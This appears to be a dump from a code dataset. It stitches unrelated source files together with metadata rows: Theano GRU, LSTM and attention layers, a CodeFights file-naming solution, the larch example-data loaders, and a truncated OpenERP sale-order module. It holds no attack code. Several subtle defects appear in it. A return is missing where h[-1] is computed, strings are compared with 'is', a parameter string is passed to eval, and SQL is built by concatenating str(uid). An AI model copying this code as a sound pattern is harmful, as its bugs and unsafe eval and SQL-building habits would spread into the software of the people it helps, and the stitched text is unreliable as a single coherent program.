x_z = T.concatenate([T.dot(X, self.W_h1) + self.b_h1, T.dot(X, self.W_h2) + self.b_h2,T.dot(X, self.W_h3) + self.b_h3,T.dot(X, self.W_h4) + self.b_h4], axis=-1)
if init_state is None: init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h])
if self.return_seq is False:
h[-1]
return h.dimshuffle((1, 0, 2))
class Attention2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
#self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.W_l = glorot_uniform((n_hidden,n_hidden))
self.W_lh = glorot_uniform((n_hidden,n_hidden))
self.W_vh = glorot_uniform((n_hidden,n_hidden))
self.U_att= orthogonal((n_hidden,1))
self.b_att= zero((1,))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v,self.W_l,self.U_att,self.b_att,self.W_lh,self.W_vh]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def _step(self,h_tm1,p_x,p_xm,ctx):
#visual attention
#ctx=dropout_layer(ctx)
v_a=T.exp(ctx+T.dot(h_tm1,self.W_v))
v_a=v_a/v_a.sum(1, keepdims=True)
ctx_p=ctx*v_a
#linguistic attention
l_a=p_x+T.dot(h_tm1,self.W_l)[None,:,:]
l_a=T.dot(l_a,self.U_att)+self.b_att
l_a=T.exp(l_a.reshape((l_a.shape[0],l_a.shape[1])))
l_a=l_a/l_a.sum(0, keepdims=True)
l_a=l_a*p_xm
p_x_p=(p_x*l_a[:,:,None]).sum(0)
h= T.dot(ctx_p,self.W_vh) + T.dot(p_x_p,self.W_lh)
return h
def get_output(self,train=False):
if self.mode is 'soft':
X = self.get_input(train)
padded_mask = self.get_mask().astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0))
p_x = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
ctx=dropout_layer(ctx,0.25)
h, _ = theano.scan(self._step,
#sequences = [X],
outputs_info = T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1),
non_sequences=[p_x,padded_mask,ctx],
n_steps=X.shape[0] )
return h[-1]
class Attention3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
if self.mode is 'soft':
X=self.get_input(train)
img=T.dot(self.input2,self.W_c)+self.b_c
output=self.activation(T.dot(X,self.W_h)+self.b_h+img)
output=T.dot(output,self.W_v)
#x_mask=self.x_mask.astype('int8')
e=T.exp(output)
e=e/e.sum(1, keepdims=True)
#e=e*x_mask
output=(img*e)+X
return output
class GRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c#, self.W_hc
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h, ctx):
ctx=dropout_layer(ctx)
c=ctx#+T.dot(h_tm1,self.W_hc)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
#init_state=ctx
h, _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h, ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class GRU3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.W_hl=glorot_uniform((n_hidden,n_hidden))
self.W_cl=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c, self.W_hc,
self.W_hl,self.W_cl
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,l_tm1,
u_z, u_r, u_h, ctx):
c=ctx+T.dot(h_tm1,self.W_hc)
c=tanh(c)
c=T.exp(c)
c=c/c.sum(-1, keepdims=True)
c=ctx*c
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1+c
logit=tanh(T.dot(h_t, self.W_hl)+T.dot(c, self.W_cl))
return h_t,logit
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
ctx=dropout_layer(self.input2,0.25)
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(ctx, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
[h,logit], _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=[init_state,init_state],
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return logit[-1]
return logit.dimshuffle((1, 0, 2))
class LSTM2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_i = glorot_uniform((n_in,n_hidden))
self.U_i = orthogonal((n_hidden,n_hidden))
self.b_i = zero((n_hidden,))
self.W_f = glorot_uniform((n_in,n_hidden))
self.U_f = orthogonal((n_hidden,n_hidden))
self.b_f = one((n_hidden,))
self.W_c = glorot_uniform((n_in,n_hidden))
self.U_c = orthogonal((n_hidden,n_hidden))
self.b_c = zero((n_hidden,))
self.W_o = glorot_uniform((n_in,n_hidden))
self.U_o = orthogonal((n_hidden,n_hidden))
self.b_o = zero((n_hidden,))
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
]
self.L1 = 0
self.L2_sqr = 0
def _step(self,
xi_t, xf_t, xo_t, xc_t, mask_tm1,
h_tm1, c_tm1,
u_i, u_f, u_o, u_c):
i_t = hard_sigmoid(xi_t + T.dot(h_tm1, u_i))
f_t = hard_sigmoid(xf_t + T.dot(h_tm1, u_f))
c_t = f_t * c_tm1 + i_t * self.activation(xc_t + T.dot(h_tm1, u_c))
c_t = mask_tm1 * c_t + (1. - mask_tm1) * c_tm1
o_t = hard_sigmoid(xo_t + T.dot(h_tm1, u_o))
h_t = o_t * self.activation(c_t)
h_t = mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t, c_t
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
init_state=self.input2
[h, c], _ = theano.scan(self._step,
sequences=[xi, xf, xo, xc, padded_mask],
outputs_info=[
init_state,
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class BiDirectionGRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',output_mode='concat',return_seq=True):
self.n_in=int(n_in)
if output_mode is 'concat':n_hidden=int(n_hidden/2)
self.n_hidden=int(n_hidden)
self.output_mode = output_mode
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
# forward weights
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
# backward weights
self.Wb_z = glorot_uniform((n_in,n_hidden))
self.Ub_z = glorot_uniform((n_hidden,n_hidden))
self.bb_z = zero((n_hidden,))
self.Wb_r = glorot_uniform((n_in,n_hidden))
self.Ub_r = glorot_uniform((n_hidden,n_hidden))
self.bb_r = zero((n_hidden,))
self.Wb_h = glorot_uniform((n_in,n_hidden))
self.Ub_h = glorot_uniform((n_hidden,n_hidden))
self.bb_h = zero((n_hidden,))
self.Wb_c = glorot_uniform((4096,n_hidden))
self.bb_c = zero((n_hidden,))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c,
self.Wb_z, self.Ub_z, self.bb_z,
self.Wb_r, self.Ub_r, self.bb_r,
self.Wb_h, self.Ub_h, self.bb_h,
self.Wb_c, self.bb_c
]
self.L1 = T.sum(abs(self.W_z))+T.sum(abs(self.U_z))+\
T.sum(abs(self.W_r))+T.sum(abs(self.U_r))+\
T.sum(abs(self.W_h))+T.sum(abs(self.U_h))+\
T.sum(abs(self.Wb_z))+T.sum(abs(self.Ub_z))+\
T.sum(abs(self.Wb_r))+T.sum(abs(self.Ub_r))+\
T.sum(abs(self.Wb_h))+T.sum(abs(self.Ub_h))
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)+\
T.sum(self.Wb_z**2) + T.sum(self.Ub_z**2)+\
T.sum(self.Wb_r**2) + T.sum(self.Ub_r**2)+\
T.sum(self.Wb_h**2) + T.sum(self.Ub_h**2)
def _fstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def _bstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def get_forward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._fstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def get_backward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.Wb_z) + self.bb_z
x_r = T.dot(X, self.Wb_r) + self.bb_r
x_h = T.dot(X, self.Wb_h) + self.bb_h
ctx = T.dot(self.input2, self.Wb_c) + self.bb_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._bstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.Ub_z, self.Ub_r, self.Ub_h, ctx],go_backwards = True)
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
forward = self.get_forward_output(train)
backward = self.get_backward_output(train)
if self.output_mode is 'sum':
return forward + backward
elif self.output_mode is 'concat':
if self.return_seq: axis=2
else: axis=1
return T.concatenate([forward, backward], axis=axis)
else:
raise Exception('output mode is not sum or concat') | gpl-3.0 | 7,263,858,907,643,852,000 | 33.645113 | 168 | 0.489496 | false | 2.740988 | false | false | false |
HKuz/Test_Code | CodeFights/fileNaming.py | 1 | 1488 | #!/usr/local/bin/python
# Code Fights File Naming Problem
def fileNaming(names):
valid = []
tmp = dict()
for name in names:
if name not in tmp:
valid.append(name)
tmp[name] = True
else:
# That file name has been used
k = 1
new = name
while new in tmp:
new = name + '(' + str(k) + ')'
k += 1
valid.append(new)
tmp[new] = True
return valid
def main():
tests = [
[
["doc", "doc", "image", "doc(1)", "doc"],
["doc", "doc(1)", "image", "doc(1)(1)", "doc(2)"]
],
[
["a(1)", "a(6)", "a", "a", "a", "a", "a", "a", "a", "a", "a", "a"],
["a(1)", "a(6)", "a", "a(2)", "a(3)", "a(4)", "a(5)", "a(7)",
"a(8)", "a(9)", "a(10)", "a(11)"]
],
[
["dd", "dd(1)", "dd(2)", "dd", "dd(1)", "dd(1)(2)", "dd(1)(1)",
"dd", "dd(1)"],
["dd", "dd(1)", "dd(2)", "dd(3)", "dd(1)(1)", "dd(1)(2)",
"dd(1)(1)(1)", "dd(4)", "dd(1)(3)"]
]
]
for t in tests:
res = fileNaming(t[0])
ans = t[1]
if ans == res:
print("PASSED: fileNaming({}) returned {}"
.format(t[0], res))
else:
print("FAILED: fileNaming({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
| mit | -816,034,966,986,424,000 | 26.054545 | 79 | 0.348118 | false | 3.04918 | false | false | false |
jpn--/larch | larch/data_services/examples.py | 1 | 3855 | import os
import tables as tb
import pandas as pd
def MTC():
from larch.dataframes import DataFrames
from larch.data_warehouse import example_file
ca = pd.read_csv(example_file('MTCwork.csv.gz'), index_col=('casenum', 'altnum'))
ca['altnum'] = ca.index.get_level_values('altnum')
dt = DataFrames(
ca,
ch="chose",
crack=True,
alt_codes=[1, 2, 3, 4, 5, 6],
alt_names=['DA', 'SR2', 'SR3', 'TRANSIT', 'BIKE', 'WALK']
)
dt.data_ce_as_ca("_avail_")
return dt
# from .service import DataService
# from .h5 import H5PodCA, H5PodCO
# warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'MTCwork.h5d')
# f = tb.open_file(warehouse_file, mode='r')
# idca = H5PodCA(f.root.larch.idca)
# idco = H5PodCO(f.root.larch.idco)
# return DataService(pods=[idca,idco], altids=[1,2,3,4,5,6], altnames=['DA','SR2','SR3','TRANSIT','BIKE','WALK'])
def EXAMPVILLE(model=None):
from ..util import Dict
evil = Dict()
from .service import DataService
import numpy
from .h5 import H5PodCA, H5PodCO, H5PodRC, H5PodCS
from ..omx import OMX
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
evil.skims = OMX(os.path.join(warehouse_dir,'exampville.omx'), mode='r')
evil.tours = H5PodCO(os.path.join(warehouse_dir,'exampville_tours.h5'), mode='r', ident='tours')
# hhs = H5PodCO(os.path.join(warehouse_dir,'exampville_hh.h5'))
# persons = H5PodCO(os.path.join(warehouse_dir,'exampville_person.h5'))
# tours.merge_external_data(hhs, 'HHID', )
# tours.merge_external_data(persons, 'PERSONID', )
# tours.add_expression("HOMETAZi", "HOMETAZ-1", dtype=int)
# tours.add_expression("DTAZi", "DTAZ-1", dtype=int)
evil.skims_rc = H5PodRC(evil.tours.HOMETAZi[:], evil.tours.DTAZi[:], groupnode=evil.skims.data, ident='skims_rc')
evil.tours_stack = H5PodCS([evil.tours, evil.skims_rc], storage=evil.tours, ident='tours_stack_by_mode').set_alts([1,2,3,4,5])
DA = 1
SR = 2
Walk = 3
Bike = 4
Transit = 5
# tours_stack.set_bunch('choices', {
# DA: 'TOURMODE==1',
# SR: 'TOURMODE==2',
# Walk: 'TOURMODE==3',
# Bike: 'TOURMODE==4',
# Transit: 'TOURMODE==5',
# })
#
# tours_stack.set_bunch('availability', {
# DA: '(AGE>=16)',
# SR: '1',
# Walk: 'DIST<=3',
# Bike: 'DIST<=15',
# Transit: 'RAIL_TIME>0',
# })
evil.mode_ids = [DA, SR, Walk, Bike, Transit]
evil.mode_names = ['DA', 'SR', 'Walk', 'Bike', 'Transit']
nZones = 15
evil.dest_ids = numpy.arange(1,nZones+1)
evil.logsums = H5PodCA(os.path.join(warehouse_dir,'exampville_mc_logsums.h5'), mode='r', ident='logsums')
return evil
def SWISSMETRO():
from ..util.temporaryfile import TemporaryGzipInflation
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
from .service import DataService
from .h5 import H5PodCO, H5PodCS
warehouse_file = TemporaryGzipInflation(os.path.join(warehouse_dir, "swissmetro.h5.gz"))
f = tb.open_file(warehouse_file, mode='r')
idco = H5PodCO(f.root.larch.idco)
stack = H5PodCS(
[idco], ident='stack_by_mode', alts=[1,2,3],
traveltime={1: "TRAIN_TT", 2: "SM_TT", 3: "CAR_TT"},
cost={1: "TRAIN_CO*(GA==0)", 2: "SM_CO*(GA==0)", 3: "CAR_CO"},
avail={1:'TRAIN_AV*(SP!=0)', 2:'SM_AV', 3:'CAR_AV*(SP!=0)'},
choice={1: "CHOICE==1", 2: "CHOICE==2", 3: "CHOICE==3"},
)
return DataService(pods=[idco, stack], altids=[1,2,3], altnames=['Train', 'SM', 'Car'])
def ITINERARY_RAW():
warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'itinerary_data.csv.gz')
import pandas
return pandas.read_csv(warehouse_file)
def example_file(filename):
warehouse_file = os.path.normpath( os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', filename) )
if os.path.exists(warehouse_file):
return warehouse_file
raise FileNotFoundError(f"there is no example data file '{warehouse_file}' in data_warehouse")
| gpl-3.0 | 2,696,184,256,727,657,500 | 37.168317 | 127 | 0.659663 | false | 2.378162 | false | false | false |
trabacus-softapps/docker-magicecommerce | additional_addons/magicemart/m8_sale.py | 1 | 45772 | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from datetime import datetime, timedelta
import time
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
import amount_to_text_softapps
from lxml import etree
from openerp.osv.orm import setup_modifiers
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
class sale_order(osv.osv):
_inherit = 'sale.order'
# Many2one Arrow button should not come for Customer Portal User and Manager
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
user = self.pool.get('res.users').browse(cr,uid,uid)
if context is None:
context = {}
res = super(sale_order, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
doc = etree.XML(res['arch'])
cr.execute("""select uid from res_groups_users_rel where gid in
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name in ('User','Manager')) and uid = """+str(uid))
portal_user = cr.fetchone()
if portal_user:
if ('fields' in res) and (res['fields'].get('order_line'))\
and (res['fields']['order_line'].get('views'))\
and (res['fields']['order_line']['views'].get('tree'))\
and (res['fields']['order_line']['views']['tree'].get('arch')):
# doc = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
# print 'doc',res['fields']['order_line']['views']['tree']['arch']
doc1 = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
for node in doc1.xpath("//field[@name='price_unit']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
for node in doc1.xpath("//field[@name='tax_id']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
#
# if portal_user:
if view_type == 'form':
domain = "[('id','child_of',"+str(user.partner_id.id)+")]"
for node in doc.xpath("//field[@name='pricelist_id']"):
node.set('options', '{"no_open":True}')
node.set('readonly','1')
setup_modifiers(node,res['fields']['pricelist_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_id']"):
node.set('options', "{'no_open' : true}")
node.set('options', "{'no_create' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='contact_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['contact_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_invoice_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_invoice_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_shipping_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_shipping_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='warehouse_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['warehouse_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='payment_term']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['payment_term'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='date_order']"):
node.set('readonly', "1")
setup_modifiers(node, res['fields']['date_order'])
res['arch'] = etree.tostring(doc)
return res
def _get_default_warehouse(self, cr, uid, context=None):
if not context:
context = {}
company_id = self.pool.get('res.users')._get_company(cr, context.get('uid',uid), context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def default_get(self, cr, uid, fields, context=None):
res = super(sale_order,self).default_get(cr, uid, fields, context)
user = self.pool.get('res.users').browse(cr, uid, uid)
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
res['partner_id'] = user.partner_id.id
res.update({'order_policy': 'picking'})
return res
def _get_portal(self, cr, uid, ids, fields, args, context=None):
res = {}
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
for case in self.browse(cr, uid, ids):
res[case.id] = {'lock_it': False}
lock_flag = False
if case.state not in ('sent', 'draft'):
lock_flag = True
if uid == portal_group:
if case.state in ('sent', 'draft') and case.sent_portal:
lock_flag = True
res[case.id]= lock_flag
return res
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
# Overriden Discount is not considering in tax(Removing Discount in this function)
def _amount_line_tax(self, cr, uid, line, context=None):
val = 0.0
for c in self.pool.get('account.tax').compute_all(cr, uid, line.tax_id, line.price_unit, line.product_uom_qty, line.product_id, line.order_id.partner_id)['taxes']:
val += c.get('amount', 0.0)
return val
def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
cur_obj = self.pool.get('res.currency')
res = {}
for order in self.browse(cr, uid, ids, context=context):
res[order.id] = {
'amount_untaxed': 0.0,
'amount_tax': 0.0,
'amount_total': 0.0,
}
val = val1 = 0.0
cur = order.pricelist_id.currency_id
for line in order.order_line:
val1 += line.price_subtotal
val += self._amount_line_tax(cr, uid, line, context=context)
res[order.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
res[order.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, val1)
res[order.id]['amount_total'] = round(res[order.id]['amount_untaxed'] + res[order.id]['amount_tax'])
return res
# Funtion To Convert Amount to Text
def _amt_in_words(self, cr, uid, ids, field_name, args, context=None):
res={}
for case in self.browse(cr, uid, ids):
txt=''
if case.amount_total:
txt += amount_to_text_softapps._100000000_to_text(int(round(case.amount_total)))
res[case.id] = txt
return res
_columns ={
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'contact_id' : fields.many2one('res.partner','Contact Person'),
#inherited
'amount_untaxed': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Untaxed Amount',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The amount without tax.", track_visibility='always'),
'amount_tax': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Taxes',
store={
